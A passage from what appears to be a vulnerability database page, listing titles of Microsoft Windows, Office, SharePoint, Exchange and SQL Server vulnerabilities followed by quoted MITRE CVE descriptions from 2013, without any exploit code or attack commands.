Windows up to Server 2016 PDF Library memory corruption [106498] Microsoft Windows up to Server 2016 Shell privilege escalation [106496] Microsoft Windows up to Server 2016 Uniscribe information disclosure [106495] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [106492] Microsoft Windows Server 2012/Server 2012 R2/Server 2016 DHCP Service memory corruption [106489] Microsoft Windows up to Server 2016 Graphics Win32k win32k!fsc_CalcGrayRow information disclosure [106474] Microsoft Office 2016 memory corruption [106473] Microsoft SharePoint Server 2013 SP1 cross site scripting [106472] Microsoft Windows up to Server 2016 Bluetooth Driver Object BlueBorne privilege escalation [106470] Microsoft Excel 2011 on Mac memory corruption [106455] Microsoft Exchange Server 2013/2016 information disclosure [106454] Microsoft Windows up to Server 2016 Windows NetBT Session Services race condition [105035] Microsoft SharePoint Server 2010 SP2 cross site scripting [105017] Microsoft Windows up to Server 2016 Error Reporting privilege escalation [105013] Microsoft Windows 10 1607/10 1703/Server 2016 Hyper-V privilege escalation [105011] Microsoft Windows up to Server 2016 Windows Search memory corruption [105010] Microsoft Windows up to Server 2016 Win32k privilege escalation [105009] Microsoft Windows up to Server 2016 Input Method Editor Data Processing Error [105008] Microsoft SQL Server 2012/2014/2016 Analysis Services information disclosure [104990] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [104989] Microsoft Windows up to Server 2016 NetBIOS Data Processing Error [104584] Microsoft Outlook up to 2016 C2R Document File privilege escalation [104583] Microsoft Outlook up to 2016 C2R Email privilege escalation [104582] Microsoft Outlook up to 2016 C2R Object information disclosure [103468] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 Redirect [103446] Microsoft Windows up to Server 2016 Search privilege escalation [103445] Microsoft Windows up to Server 2016 Wordpad privilege escalation [103444] Microsoft Windows up to Server 2016 Explorer privilege escalation [103442] Microsoft Windows 10/Server 2016 HoloLens privilege escalation [103441] Microsoft Windows up to Server 2016 Object HTTP.sys information disclosure [103431] Microsoft Windows up to Server 2016 PowerShell privilege escalation [103429] Microsoft Windows up to Server 2016 Kerberos privilege escalation [103426] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 OWA cross site scripting [103425] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 OWA cross site scripting [103420] Microsoft Windows up to Server 2016 Kerberos weak authentication [103417] Microsoft Windows up to Server 2016 Windows Shell 7PK Security Features [102463] Microsoft Project Server 2013 SP1 cross site scripting [102460] Microsoft Outlook 2016 on Mac HTML privilege escalation [102448] Microsoft SharePoint Enterprise Server 2016 Reflected cross site scripting [102446] Microsoft Office up to 2016 Data Processing Error [102445] Microsoft Office 2010 SP2/2011/2013 RT SP1/2013 SP1/2016 Data Processing Error [102443] Microsoft Office up to 2016 Data Processing Error [102412] Microsoft Windows up to Server 2016 PDF privilege escalation [102397] Microsoft Outlook 2010 SP1/2013 SP1/2016 DLL Loader privilege escalation [102396] Microsoft Office 2013 SP1/2016 DLL Loader privilege escalation [102386] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [102385] Microsoft Windows up to Server 2016 Font Library memory corruption [102376] Microsoft Windows up to Server 2016 CAB File Data Processing Error [102375] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102374] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102373] Microsoft Windows up to Server 2016 Uniscribe Font USP10!MergeLigRecords privilege escalation [101817] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101816] Microsoft Windows up to Server 2016 Malware Protection Engine setCaller memory corruption [101815] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101814] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101813] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101812] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101811] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101810] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101028] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [101020] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [101019] Microsoft Skype for Business 2016 Data Processing Error [101018] Microsoft SharePoint 2010 SP2/2013 SP1/2016 Data Processing Error [101016] Microsoft PowerPoint 2011 on Mac memory corruption [101015] Microsoft PowerPoint 2011 on Mac memory corruption [101014] Microsoft Office 2010 SP2/2016 Data Processing Error [101013] Microsoft Office 2010 SP2/2016 privilege escalation [101002] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101001] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101000] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100999] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100918] Microsoft Windows 8/8.1/10/Server 2012/Server 2016 Malware Protection Service memory corruption [99697] Microsoft SharePoint Server 2010 SP1/2010 SP2 Excel Services cross site scripting [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [99682] Microsoft Outlook 2011 on Mac HTML Tag Validator privilege escalation [99681] Microsoft Windows up to Server 2016 OLE Integrity-Level Check privilege escalation [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98272] Microsoft Windows up to 10/Server 2016 Local Session privilege escalation [98096] Microsoft Exchange 2013 SP1 cross site scripting [98095] Microsoft Lync for Mac 2011 Certificate Validation weak authentication [98094] Microsoft SharePoint Server 2013 SP1 cross site scripting [98093] Microsoft SharePoint Server/Office Web Apps 2010 SP2 information disclosure [98091] Microsoft SharePoint Server/Office Web Apps 2010 SP2 memory corruption [98090] Microsoft SharePoint Server 2010 SP2/2013 SP1 information disclosure [98089] Microsoft Office Web Apps 2013 SP1 memory corruption [98082] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [98081] Microsoft Excel up to 2016 information disclosure [98080] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [98079] Microsoft Word 2016 memory corruption [98076] Microsoft Lync/Skype for Business 2010/2013/2016 Graphics Component memory corruption [98075] Microsoft Lync/Skype for Business 2010/2013/2016 GDI+ information disclosure [98074] Microsoft Lync/Skype for Business 2010/2013/2016 GDI+ information disclosure [98073] Microsoft Office 2010 SP2/Word Viewer Graphics Component privilege escalation [98069] Microsoft Windows up to Server 2012 R2 Color Management privilege escalation [98056] Microsoft Windows up to Server 2016 DNS Query information disclosure [98054] Microsoft Windows up to Server 2016 SMBv2/SMBv3 denial of service [98017] Microsoft Windows up to Server 2016 PDF memory corruption [98015] Microsoft Windows 10/Server 2016 Hyper-V privilege escalation [98013] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [98007] Microsoft Windows 10/Server 2016 Hyper-V Network Switch privilege escalation [98006] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [96521] Microsoft Windows 8.1/10/Server 2012/Server 2016 SMB Response mrxsmb20.sys denial of service [95781] Microsoft PowerPoint 2016 Java Embedded Object privilege escalation [95125] Microsoft Word/SharePoint Enterprise Server 2016 Document memory corruption [94451] Microsoft Office 2011 memory corruption [94447] Microsoft Office 2010 SP2 memory corruption [94446] Microsoft Office 2016 memory corruption [94444] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 OLE DLL Loader Data Processing Error [94443] Microsoft Office up to 2016 information disclosure [94442] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [93964] Microsoft Windows 7 Excel Starter 2010 XML External Entity [93543] Microsoft SQL Server 2016 FILESTREAM Path information disclosure [93540] Microsoft Excel 2010 SP2/2011/2016 memory corruption [93416] Microsoft SQL Server 2014 SP2/2016/up to 2012 SP3 Server Agent atxcore.dll privilege escalation [93415] Microsoft SQL Server 2016 MDS API cross site scripting [93414] Microsoft SQL Server up to 2012 SP3 RDBMS Engine privilege escalation [93413] Microsoft SQL Server 2016/up to 2014 SP2 RDBMS Engine privilege escalation [93412] Microsoft SQL Server 2016 RDBMS Engine privilege escalation [93393] Microsoft Office up to 2016 memory corruption [93392] Microsoft Office up to 2016 memory corruption [93391] Microsoft Office up to 2016 memory corruption [93389] Microsoft Windows up to Server 2016 Media Foundation memory corruption [93388] Microsoft Windows up to Server 2016 Animation Manager Stylesheets memory corruption [92587] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Transaction Manager privilege escalation [92584] Microsoft Office up to 2016 memory corruption [91571] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91570] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91556] Microsoft Exchange 2016 Meeting Invation cross site scripting [91555] Microsoft Exchange 2013/2016 Link privilege escalation [91550] Microsoft Office 2016 memory corruption [91547] Microsoft Office 2010 memory corruption [91543] Microsoft Office up to 2016 memory corruption [91541] Microsoft Office 2013/2016 APP-V 7PK Security Features [90711] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF privilege escalation [90710] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 Netlogon privilege escalation [90704] Microsoft Office 2013/2013 RT/2016 memory corruption [89043] Microsoft Office up to 2016 memory corruption [89041] Microsoft Office up to 2016 memory corruption [89040] Microsoft Office 2010 SP2/2011/2013 RT SP1/2013 SP1/2016 memory corruption [89038] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Security Feature 7PK Security Features [89037] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [87961] Microsoft Windows up to Server 2012 R2 Search privilege escalation [87959] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87958] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF privilege escalation [87957] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87956] Microsoft Exchange 2013/2016 Oracle Outside In Libraries information disclosure [87944] Microsoft Windows Server 2012/Server 2012 R2 Virtual PCI Memory information disclosure [87940] Microsoft Windows Server 2012/Server 2012 R2 DNS Server memory corruption [87936] Microsoft Office up to 2016 privilege escalation [87166] Microsoft Windows up to Server 2012 R2 DirectX Graphics Kernel Subsystem privilege escalation [87156] Microsoft Windows 8.1/10/RT 8.1/Server 2012 R2 Shell privilege escalation [87149] Microsoft Office up to 2016 memory corruption [87148] Microsoft Office 2010 Graphics privilege escalation [87146] Microsoft Office 2011/2013/2013 RT/2016 memory corruption [82229] Microsoft Excel 2010 SP2 Office Document memory corruption [82223] Microsoft Windows 8.1/10/Server 2012 R2 Hyper-V Memory information disclosure [82222] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Memory information disclosure [82221] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Hyper-V privilege escalation [81274] Microsoft Office up to 2016 memory corruption [81270] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library privilege escalation [81269] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81268] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [80886] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [80885] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80878] Microsoft Windows Server 2012 R2 Active Directory Federation Service privilege escalation [80874] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80870] Microsoft Office up to 2016 memory corruption [80868] Microsoft Office up to 2016 memory corruption [80867] Microsoft Office up to 2016 memory corruption [80865] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 DLL Loader privilege escalation [80860] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Reader privilege escalation [80859] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF Library memory corruption [80231] Microsoft Excel up to 2016 Office Document memory corruption [80229] Microsoft Exchange Server 2013 CU 10/2013 CU 11/2013 SP1/2016 Outlook Web Access cross site scripting [80228] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [80227] Microsoft Exchange Server 2013 CU 10/2013 SP1/2016 Outlook Web Access cross site scripting [80226] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [80218] Microsoft Office up to 2016 ASLR information disclosure [80217] Microsoft SharePoint Foundation 2013 SP1 Access Control Policy cross site scripting [80216] Microsoft Office up to 2016 Office Document memory corruption [80206] Microsoft SharePoint Foundation 2013 SP1 Access Control Policy cross site scripting [79508] Microsoft Windows up to Server 2012 R2 Library Loader privilege escalation [79500] Microsoft Office 2010/2011/2016 memory corruption [79183] Microsoft Windows up to Server 2012 R2 IPsec denial of service [79173] Microsoft Windows up to Server 2012 R2 Graphics information disclosure [79117] Microsoft Outlook 2011/2016 on Mac HTML cross site scripting [78375] Microsoft SharePoint Server/SharePoint Foundation 2013 SP1 cross site scripting [77645] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting [77644] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting [77638] Microsoft Lync Server 2013 cross site scripting [77628] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [77612] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access information disclosure [77050] Microsoft Office up to 2016 memory corruption [77037] Microsoft Windows Server 2012/Server 2012 R2 System Center Operations Manager cross site scripting [76461] Microsoft Windows up to Server 2012 R2 Domain-Controller Communication Credentials information disclosure [76460] Microsoft Windows 7 SP1/8/Server 2012 RDP Server Service Data Processing Error [76448] Microsoft Windows 8.1/Server 2012 R2 Hyper-V memory corruption [75793] Microsoft Exchange Server 2013 CU8 cross site scripting [75792] Microsoft Exchange Server 2013 SP1 CU8 cross site request forgery [75791] Microsoft Office 2013 SP1 Office Document Data Processing Error [75787] Microsoft Exchange Server 2013 SP1 CU8 Same Origin Policy privilege escalation [75786] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1 Office Document Data Processing Error [74848] Microsoft SharePoint Foundation/SharePoint Server 2013 SP1 cross site scripting [74842] Microsoft Windows 8.1/Server 2012 R2 Hyper-V privilege escalation [74836] Microsoft Project Server 2010 SP2/2013 SP1 cross site scripting [74835] Microsoft Office 2011 on Mac cross site scripting [74834] Microsoft Windows Server 2012 R2 Active Directory Federation Services 3.0 privilege escalation [74833] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 HTTP Request HTTP.sys privilege escalation [74393] Microsoft SharePoint Server 2013 Foundation cross site scripting [73967] Microsoft Office up to 2013 SP1 Office File Data Processing Error [73966] Microsoft Office up to 2013 SP1 RTF File denial of service [73965] Microsoft Office up to 2013 SP1 memory corruption [73961] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 Remote Desktop Protocol Object Management denial of service [69160] Microsoft Windows up to Server 2012 Process privilege escalation [69156] Microsoft Office 2010 Object denial of service [68593] Microsoft Windows up to Server 2012 Network Location Awareness Service privilege escalation [62238] Microsoft Visual Studio Team Foundation Server 2010 cross site scripting [58487] Microsoft SharePoint Foundation 2010 cross site scripting [58486] Microsoft SharePoint Foundation 2010 Reflected cross site scripting [58485] Microsoft SharePoint Foundation 2010 EditForm.aspx cross site scripting [55777] Microsoft Windows Movie Maker 2.6 memory corruption [54549] Microsoft PowerPoint 2010 pptimpconv.dll memory corruption [54341] Microsoft Windows Movie Maker 2.1 privilege escalation [68417] Microsoft Exchange 2013 Outlook Web Access privilege escalation [68191] Microsoft SharePoint 2010 cross site scripting [67518] Microsoft Lync 2013 denial of service [67517] Microsoft Lync 2013 Script Reflected cross site scripting [67516] Microsoft Lync 2010/2013 privilege escalation [67362] Microsoft Windows up to Server 2012 R2 Remote Procedure Call denial of service [67360] Microsoft SharePoint 2013 App Permission Management privilege escalation [66976] Microsoft Access 2010 VBA denial of service [13549] Microsoft Windows 7/8/8.1/Server 2012 Remote Desktop Protocol weak encryption [13547] Microsoft Lync 2010/2013 Meeting cross site scripting [13228] Microsoft Office 2013 Document information disclosure [12311] Microsoft Lync 2010 Search privilege escalation [12263] Microsoft Windows up to Server 2012 Direct2D memory corruption [12238] Microsoft Windows 8/RT/Server 2012 IPv6 privilege escalation [12185] Microsoft .NET Framework 2/4 HMAC weak authentication [11673] Microsoft Windows Live Movie Maker 2011 WAV File privilege escalation [11468] Microsoft Exchange 2010/2013 cross site scripting [11466] Microsoft Office 2013 File Response information disclosure [11457] Microsoft SharePoint Server/Office Web Apps 2010 SP1/2010 SP2/2013 W3WP Service Account privilege escalation [11150] Microsoft Windows 8/Server 2012 Hyper-V Data Structure Value privilege escalation [11004] Microsoft Windows Server 2012 R2 RDP Restricted Admin Mode weak authentication [10250] Microsoft SharePoint Server up to 2013 W3WP Process privilege escalation [10249] Microsoft SharePoint 2010/2003/2007/2.0/3.0 Workflow privilege escalation [10248] Microsoft SharePoint Server up to 2013 cross site scripting [9943] Microsoft Windows Server 2012 NAT Driver memory corruption [8739] Microsoft Windows Essentials up to 2012 Windows Writer privilege escalation [8725] Microsoft Lync 2010/2013 memory corruption [8722] Microsoft Windows 8/RT/Server 2012 HTTP.sys memory corruption [8206] Microsoft SharePoint Server 2010 SP1 HTML Sanitization Component cross site scripting [8203] Microsoft Windows up to 2012 AD LDAP Query privilege escalation [8200] Microsoft SharePoint Server 2013 ACL privilege escalation [7971] Microsoft Office for Mac 2011 up to 14.3.1 on Mac HTML5 Mail Message Parser information disclosure [7968] Microsoft SharePoint Server 2010 SP1 Input Validator memory corruption [7967] Microsoft SharePoint Server 2010 SP1 User Account directory traversal [7966] Microsoft SharePoint Server 2010 SP1 cross site scripting [7965] Microsoft SharePoint Server 2010 SP1 User Account Callback privilege escalation [7343] Microsoft Lync 2012 HTTP Format String [7258] Microsoft Windows up to 8/Server 2012 SSL/TLS privilege escalation [7230] Microsoft Excel 2010 SP1 on 32-bit XLS File denial of service [6831] Microsoft Office Picture Manager 2010 File memory corruption [6624] Microsoft SQL Server up to 2012 Report Manager cross site scripting [5644] Microsoft SharePoint 2010 scriptesx.ashx cross site scripting [5641] Microsoft SharePoint 2010 cross site scripting [4640] Microsoft SharePoint 2010 inplview.aspx cross site scripting [4636] Microsoft SharePoint 2010 wizardlist.aspx cross site scripting [4635] Microsoft SharePoint 2010 themeweb.aspx cross site scripting [4414] Microsoft SharePoint 2010 cross site scripting [4413] Microsoft SharePoint 2010/2007/3.0 XML/XLS information disclosure MITRE CVE - https://cve.mitre.org: [CVE-2013-3661] The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not check whether linked-list traversal is continually accessing the same list member, which allows local users to cause a denial of service (infinite traversal) via vectors that trigger a crafted PATHRECORD chain. [CVE-2013-3660] The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 does not properly initialize a pointer for the next object in a certain list, which allows local users to obtain write access to the PATHRECORD chain, and consequently gain privileges, by triggering excessive consumption of paged memory and then making many FlattenPath function calls, aka "Win32k Read AV Vulnerability." [CVE-2013-3174] DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted GIF file, aka "DirectShow Arbitrary Memory Overwrite Vulnerability." [CVE-2013-3173] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overwrite Vulnerability." [CVE-2013-3172] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to cause a denial of service (system hang) via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-3171] The serialization functionality in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly check the permissions of delegate objects, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a partial-trust relationship, aka "Delegate Serialization Vulnerability." [CVE-2013-3167] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." [CVE-2013-3154] The signature-update functionality in Windows Defender on Microsoft Windows 7 and Windows Server 2008 R2 relies on an incorrect pathname, which allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory, aka "Microsoft Windows 7 Defender Improper Pathname Vulnerability." [CVE-2013-3138] Integer overflow in the TCP/IP kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (system hang) via crafted TCP packets, aka "TCP/IP Integer Overflow Vulnerability." [CVE-2013-3136] The kernel in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 on 32-bit platforms does not properly handle unspecified page-fault system calls, which allows local users to obtain sensitive information from kernel memory via a crafted application, aka "Kernel Information Disclosure Vulnerability." [CVE-2013-3134] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 on 64-bit platforms does not properly allocate arrays of structures, which allows remote attackers to execute arbitrary code via a crafted .NET Framework application that changes array data, aka "Array Allocation Vulnerability." [CVE-2013-3133] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check the permissions of objects that use reflection, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Anonymous Method Injection Vulnerability." [CVE-2013-3132] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check the permissions of objects that use reflection, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Delegate Reflection Bypass Vulnerability." [CVE-2013-3131] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5, and Silverlight 5 before 5.1.20513.0, does not properly prevent changes to data in multidimensional arrays of structures, which allows remote attackers to execute arbitrary code via (1) a crafted .NET Framework application or (2) a crafted Silverlight application, aka "Array Access Violation Vulnerability." [CVE-2013-1345] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Vulnerability." [CVE-2013-1340] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Dereference Vulnerability." [CVE-2013-1339] The Print Spooler in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly manage memory during deletion of printer connections, which allows remote authenticated users to execute arbitrary code via a crafted request, aka "Print Spooler Vulnerability." [CVE-2013-1336] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check signatures, which allows remote attackers to make undetected changes to signed XML documents via unspecified vectors that preserve signature validity, aka "XML Digital Signature Spoofing Vulnerability." [CVE-2013-1335] Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code via crafted shape data in a Word document, aka "Word Shape Corruption Vulnerability." [CVE-2013-1334] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Window Handle Vulnerability." [CVE-2013-1332] dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "DirectX Graphics Kernel Subsystem Double Fetch Vulnerability." [CVE-2013-1331] Buffer overflow in Microsoft Office 2003 SP3 and Office 2011 for Mac allows remote attackers to execute arbitrary code via crafted PNG data in an Office document, leading to improper memory allocation, aka "Office Buffer Overflow Vulnerability." [CVE-2013-1329] Integer signedness error in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers a buffer underflow, aka "Publisher Buffer Underflow Vulnerability." [CVE-2013-1328] Microsoft Publisher 2003 SP3, 2007 SP3, and 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers incorrect pointer handling, aka "Publisher Pointer Handling Vulnerability." [CVE-2013-1327] Integer signedness error in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers an improper memory allocation, aka "Publisher Signed Integer Vulnerability." [CVE-2013-1323] Microsoft Publisher 2003 SP3 does not properly handle NULL values for unspecified data items, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Incorrect NULL Value Handling Vulnerability." [CVE-2013-1322] Microsoft Publisher 2003 SP3 does not properly check table range data, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Invalid Range Check Vulnerability." [CVE-2013-1321] Microsoft Publisher 2003 SP3 does not properly check the data type of an unspecified return value, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Return Value Validation Vulnerability." [CVE-2013-1320] Buffer overflow in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Buffer Overflow Vulnerability." [CVE-2013-1319] Microsoft Publisher 2003 SP3 does not properly check the return value of an unspecified method, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Return Value Handling Vulnerability." [CVE-2013-1318] Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers access to an invalid pointer, aka "Publisher Corrupt Interface Pointer Vulnerability." [CVE-2013-1317] Integer overflow in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers an improper allocation-size calculation, aka "Publisher Integer Overflow Vulnerability." [CVE-2013-1316] Microsoft Publisher 2003 SP3 does not properly validate the size of an unspecified array, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Negative Value Allocation Vulnerability." [CVE-2013-1302] Microsoft Communicator 2007 R2, Lync 2010, Lync 2010 Attendee, and Lync Server 2013 do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via an invitation that triggers access to a deleted object, aka "Lync RCE Vulnerability." [CVE-2013-1301] Microsoft Visio 2003 SP3 2007 SP3, and 2010 SP1 allows remote attackers to read arbitrary files via an XML document containing an external entity declaration in conjunction with an entity reference, aka "XML External Entities Resolution Vulnerability." [CVE-2013-1300] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability." [CVE-2013-1295] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "CSRSS Memory Corruption Vulnerability." [CVE-2013-1294] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1293] The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application that leverages improper handling of objects in memory, aka "NTFS NULL Pointer Dereference Vulnerability." [CVE-2013-1292] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1291] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 Gold and SP1, and Windows 8 allows local users to cause a denial of service (reboot) via a crafted OpenType font, aka "OpenType Font Parsing Vulnerability" or "Win32k Font Parsing 